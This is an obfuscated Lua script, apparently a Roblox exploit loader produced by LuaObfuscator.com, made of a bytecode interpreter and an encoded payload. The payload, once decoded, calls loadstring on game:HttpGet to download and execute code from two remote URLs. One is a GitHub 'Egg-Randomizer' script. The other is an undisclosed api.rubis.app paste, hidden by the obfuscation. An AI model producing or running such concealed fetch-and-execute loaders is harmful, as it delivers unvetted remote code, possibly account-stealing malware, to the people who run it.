--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v89=v2(v0(v30,16));if v19 then local v112=0;local v113;while true do if (v112==1) then return v113;end if (v112==0) then v113=v5(v89,v19);v19=nil;v112=1;end end else return v89;end end end);local function v20(v31,v32,v33) if v33 then local v90=0 -0 ;local v91;while true do if (v90==(0 -0)) then v91=(v31/(((880 -(282 + 595)) -1)^(v32-1)))%(2^(((v33-(2 -1)) -(v32-(620 -((2192 -(1523 + 114)) + 58 + 6)))) + ((1328 -396) -(857 + 74)))) ;return v91-(v91%(569 -(367 + 201))) ;end end else local v92=(929 -(214 + 713))^(v32-1) ;return (((v31%(v92 + v92))>=v92) and (1 + 0)) or (0 + 0) ;end end local function v21() local v34=1065 -(68 + 997) ;local v35;while true do if (v34==(1270 -(226 + 1044))) then v35=v1(v16,v18,v18);v18=v18 + (4 -(1 + 2)) ;v34=118 -(32 + 85) ;end if (v34==(1 + 0)) then return v35;end end end local function v22() local v36,v37=v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + (4 -2) ;return (v37 * (472 -216)) + v36 ;end local function v23() local v38,v39,v40,v41=v1(v16,v18,v18 + (4 -1) );v18=v18 + (354 -(87 + 263)) ;return (v41 * 16777216) + (v40 * 65536) + (v39 * (188 + 68)) + v38 ;end local function v24() local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(1 + 0)) then v45=1;v46=(v20(v44,3 -2 ,(1719 -747) -((1240 -(145 + 293)) + 150) ) * ((5 -3)^((487 -(44 + 386)) -25))) + v43 ;v42=2 + 0 ;end if (v42==(1000 -(915 + 82))) then if (v47==(0 -0)) then if (v46==(0 + 0)) then return v48 * (0 -0) ;else v47=1;v45=0;end elseif (v47==(3234 -(1069 + 118))) then return ((v46==((1486 -(998 + 488)) -0)) and (v48 * (1/(0 -0)))) or (v48 * NaN) ;end return v8(v48,v47-(178 + 845) ) * (v45 + (v46/((3 -1)^(52 + 0)))) ;end if ((791 -(368 + 423))==v42) then v43=v23();v44=v23();v42=3 -2 ;end if (v42==(20 -(10 + 3 + 5))) then v47=v20(v44,80 -59 ,473 -(416 + 26) );v48=((v20(v44,32)==((3 + 0) -2)) and  -(1 + 0)) or 1 ;v42=3;end end end local function v25(v49) local v50;if  not v49 then v49=v23();if (v49==(772 -(201 + 571))) then return "";end end v50=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;local v51={};for v67=1139 -(116 + 1022) , #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v93,v94,v95,v96,v97,v98,v99,v100,v101) local v102=(function() return 0;end)();local v93=(function() return;end)();local v94=(function() return;end)();while true do local v111=(function() return 0;end)();while true do if (v111==(0 -0)) then if (v102~=(1 + 0)) then else local v121=(function() return 0 + 0 ;end)();while true do if (v121~=0) then else while true do if (0==v93) then v94=(function() return v95();end)();if (v96(v94, #"[", #"<")~=0) then else local v180=(function() return 202 -(14 + 188) ;end)();local v181=(function() return;end)();local v182=(function() return;end)();local v183=(function() return;end)();local v184=(function() return;end)();while true do if (v180==(676 -(534 + 141))) then v183=(function() return nil;end)();v184=(function() return nil;end)();v180=(function() return 1 + 1 ;end)();end if (v180~=(0 + 0)) then else local v185=(function() return 0;end)();local v186=(function() return;end)();while true do if (v185~=(0 + 0)) then else v186=(function() return 0 -0 ;end)();while true do if (v186==(0 -0)) then v181=(function() return 0 -0 ;end)();v182=(function() return nil;end)();v186=(function() return 1;end)();end if (v186==1) then v180=(function() return 1 + 0 ;end)();break;end end break;end end end if (v180==(2 + 0)) then while true do if (v181~=(398 -(115 + 281))) then else local v187=(function() return 0;end)();local v188=(function() return;end)();while true do if (v187==(0 -0)) then v188=(function() return 0 + 0 ;end)();while true do if (v188==1) then v181=(function() return  #"asd";end)();break;end if (v188==(0 -0)) then if (v96(v183, #"~", #"}")~= #"{") then else v184[7 -5 ]=(function() return v97[v184[869 -(550 + 317) ]];end)();end if (v96(v183,2,2 -0 )~= #"\\") then else v184[ #"asd"]=(function() return v97[v184[ #"19("]];end)();end v188=(function() return 1 -0 ;end)();end end break;end end end if (v181== #",") then local v189=(function() return 0 -0 ;end)();local v190=(function() return;end)();while true do if ((285 -(134 + 151))==v189) then v190=(function() return 1665 -(970 + 695) ;end)();while true do if ((0 -0)~=v190) then else v184=(function() return {v98(),v98(),nil,nil};end)();if (v182==0) then local v197=(function() return 0;end)();local v198=(function() return;end)();while true do if (v197~=0) then else v198=(function() return 0;end)();while true do if (v198~=0) then else v184[ #"91("]=(function() return v98();end)();v184[ #"asd1"]=(function() return v98();end)();break;end end break;end end elseif (v182== #",") then v184[ #"-19"]=(function() return v99();end)();elseif (v182==2) then v184[ #"xnx"]=(function() return v99() -((1992 -(582 + 1408))^16) ;end)();elseif (v182~= #"91(") then else local v203=(function() return 0;end)();local v204=(function() return;end)();while true do if (v203==(0 -0)) then v204=(function() return 0;end)();while true do if (v204==(0 -0)) then v184[ #"asd"]=(function() return v99() -(2^16) ;end)();v184[ #"?id="]=(function() return v98();end)();break;end end break;end end end v190=(function() return 3 -2 ;end)();end if (v190==(1825 -(1195 + 629))) then v181=(function() return 2 -0 ;end)();break;end end break;end end end if (v181==(241 -(187 + 54))) then local v191=(function() return 780 -(162 + 618) ;end)();local v192=(function() return;end)();while true do if (v191==0) then v192=(function() return 0;end)();while true do if (v192==(0 + 0)) then v182=(function() return v96(v94,2 + 0 , #"asd");end)();v183=(function() return v96(v94, #"0313",6);end)();v192=(function() return 1 -0 ;end)();end if (v192==(1 -0)) then v181=(function() return  #"~";end)();break;end end break;end end end if (v181== #"gha") then if (v96(v183, #"asd", #"asd")== #">") then v184[ #"0313"]=(function() return v97[v184[ #".dev"]];end)();end v100[v101]=(function() return v184;end)();break;end end break;end end end break;end end return v93,v94,v95,v96,v97,v98,v99,v100,v101;end end end if (v102==0) then local v122=(function() return 0 + 0 ;end)();while true do if (v122~=(1636 -(1373 + 263))) then else v93=(function() return 1000 -(451 + 549) ;end)();v94=(function() return nil;end)();v122=(function() return 1;end)();end if (v122==(1 + 0)) then v102=(function() return 1;end)();break;end end end break;end end end end;end)();local v53=(function() return function(v103,v104,v105) local v106=(function() return 0 -0 ;end)();local v107=(function() return;end)();while true do if (v106~=0) then else v107=(function() return 0 -0 ;end)();while true do if (v107~=(1384 -(746 + 638))) then else local v123=(function() return 0;end)();while true do if (v123==(0 + 0)) then v103[v104-#"[" ]=(function() return v105();end)();return v103,v104,v105;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v69= #"<",v58 do local v70=(function() return 341 -(218 + 123) ;end)();local v71=(function() return;end)();local v72=(function() return;end)();while true do if (1~=v70) then else if (v71== #">") then v72=(function() return v21()~=(1581 -(1535 + 46)) ;end)();elseif (v71==(2 + 0)) then v72=(function() return v24();end)();elseif (v71~= #"-19") then else v72=(function() return v25();end)();end v59[v69]=(function() return v72;end)();break;end if (v70==0) then local v115=(function() return 0 + 0 ;end)();local v116=(function() return;end)();while true do if (v115==(560 -(306 + 254))) then v116=(function() return 0 + 0 ;end)();while true do if (v116~=1) then else v70=(function() return 1 -0 ;end)();break;end if (v116~=0) then else v71=(function() return v21();end)();v72=(function() return nil;end)();v116=(function() return 1;end)();end end break;end end end end end v57[ #"19("]=(function() return v21();end)();for v73= #"{",v23() do FlatIdent_7FAC9,Descriptor,v21,v20,v59,v22,v23,v54,v73=(function() return v52(FlatIdent_7FAC9,Descriptor,v21,v20,v59,v22,v23,v54,v73);end)();end for v74= #"}",v23() do v55,v74,v28=(function() return v53(v55,v74,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[(3763 -2295) -(899 + 568) ];local v65=v61[2 + 0 ];local v66=v61[7 -4 ];return function(...) local v75=v64;local v76=v65;local v77=v66;local v78=v27;local v79=604 -((1819 -(1126 + 425)) + 335) ;local v80= -(291 -(60 + 230));local v81={};local v82={...};local v83=v12("#",...) -(573 -(426 + 146)) ;local v84={};local v85={};for v108=(405 -(118 + 287)) + 0 ,v83 do if (v108>=v77) then v81[v108-v77 ]=v82[v108 + (1457 -(282 + 1174)) ];else v85[v108]=v82[v108 + (812 -(569 + (948 -706))) ];end end local v86=(v83-v77) + 1 ;local v87;local v88;while true do v87=v75[v79];v88=v87[1122 -(118 + 1003) ];if (v88<=(14 -9)) then if (v88<=(1 + 1)) then if ((1812<=3249) and (v88<=0)) then v85[v87[1026 -(706 + 318) ]]=v87[1254 -(721 + 530) ]~=(1271 -(945 + 326)) ;elseif ((1623<=1957) and (v88>((5 -3) -1))) then local v130=v87[2 + (377 -(142 + 235)) ];local v131=v85[v87[703 -((1229 -958) + 429) ]];v85[v130 + 1 + 0 + 0 ]=v131;v85[v130]=v131[v87[1504 -(1408 + 92) ]];else local v135;local v136,v137;local v138;local v139;v85[v87[979 -(553 + 424) ]]=v63[v87[1089 -(461 + 625) ]];v79=v79 + (1289 -(993 + 295)) ;v87=v75[v79];v139=v87[2];v138=v85[v87[3]];v85[v139 + 1 + 0 ]=v138;v85[v139]=v138[v87[4]];v79=v79 + 1 ;v87=v75[v79];v85[v87[1173 -(418 + (1423 -670)) ]]=v87[3 + 0 ];v79=v79 + 1 + 0 ;v87=v75[v79];v85[v87[1 + 1 ]]=v87[3]~=(0 + 0) ;v79=v79 + 1 + 0 ;v87=v75[v79];v139=v87[531 -(406 + 123) ];v136,v137=v78(v85[v139](v13(v85,v139 + 1 ,v87[1772 -(1749 + 20) ])));v80=(v137 + v139) -(1 + 0 + 0) ;v135=1322 -(1249 + 73) ;for v168=v139,v80 do local v169=0 + 0 ;while true do if (v169==(1145 -(466 + 679))) then v135=v135 + (2 -1) ;v85[v168]=v136[v135];break;end end end v79=v79 + (2 -1) ;v87=v75[v79];v139=v87[1902 -(106 + 1794) ];v85[v139]=v85[v139](v13(v85,v139 + 1 + 0 ,v80));v79=v79 + 1 + 0 ;v87=v75[v79];v85[v87[5 -3 ]]();v79=v79 + (2 -1) ;v87=v75[v79];v85[v87[(68 + 48) -(4 + 110) ]]=v63[v87[3]];v79=v79 + ((249 + 336) -(57 + 527)) ;v87=v75[v79];v85[v87[2]]=v63[v87[3]];v79=v79 + (1428 -(41 + 1386)) ;v87=v75[v79];v139=v87[105 -(17 + 86) ];v138=v85[v87[3 + 0 ]];v85[v139 + (1 -0) ]=v138;v85[v139]=v138[v87[11 -7 ]];end elseif (v88<=(169 -(122 + 44))) then local v125=(0 + 0) -(0 -0) ;local v126;local v127;local v128;local v129;while true do if ((4412==4412) and (v125==(6 -4))) then for v173=v126,v80 do local v174=0 + 0 ;while true do if (v174==0) then v129=v129 + (2 -1) + 0 ;v85[v173]=v127[v129];break;end end end break;end if (v125==((2 -1) -0)) then v80=(v128 + v126) -(66 -(30 + 35)) ;v129=0;v125=2 + 0 ;end if (v125==(1257 -(1043 + 214))) then v126=v87[7 -5 ];v127,v128=v78(v85[v126](v13(v85,v126 + (1213 -(323 + 889)) ,v87[7 -4 ])));v125=1 + 0 ;end end elseif (v88==(584 -(361 + 219))) then v85[v87[322 -(53 + 267) ]]=v63[v87[1 + 2 ]];elseif ((1750>=842) and (v85[v87[415 -(15 + 398) ]]==v87[(4764 -3778) -(18 + 964) ])) then v79=v79 + (3 -2) ;else v79=v87[2 + 1 ];end elseif (v88<=((759 -(239 + 514)) + 2)) then if ((4372>1850) and (v88<=((301 + 555) -(20 + (2159 -(797 + 532)))))) then do return;end elseif (v88>(6 + 1)) then v79=v87[2 + 1 + (0 -0) ];else local v163=v87[128 -(116 + 10) ];v85[v163]=v85[v163](v13(v85,v163 + 1 + 0 ,v80));end elseif ((232<821) and (v88<=9)) then v85[v87[740 -(542 + 196) ]]();elseif ((518<902) and (v88>(21 -11))) then for v171=v87[2],v87[1 + 2 ] do v85[v171]=nil;end else v85[v87[2 + 0 ]]=v87[2 + 1 ];end v79=v79 + (2 -1) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!063Q00028Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403333Q00682Q7470733A2Q2F6170692E72756269732E612Q702F76322F73637261702F55433563704878546C7A647A646B374D2F726177034F3Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4372696D736F6E2D4C61672F2Q782F726566732F68656164732F6D61696E2F452Q672D52616E646F6D697A6572001B3Q00120A3Q00014Q000B000100013Q0026053Q0002000100010004083Q0002000100120A000100013Q00260500010005000100010004083Q00050001001204000200023Q001201000300033Q00202Q00030003000400122Q000500056Q000600016Q000300066Q00023Q00024Q00020001000100122Q000200023Q00122Q000300033Q00202Q00030003000400120A000500064Q0003000300054Q000700023Q00022Q00090002000100010004083Q001A00010004083Q000500010004083Q001A00010004083Q000200012Q00063Q00017Q00",v9(),...);
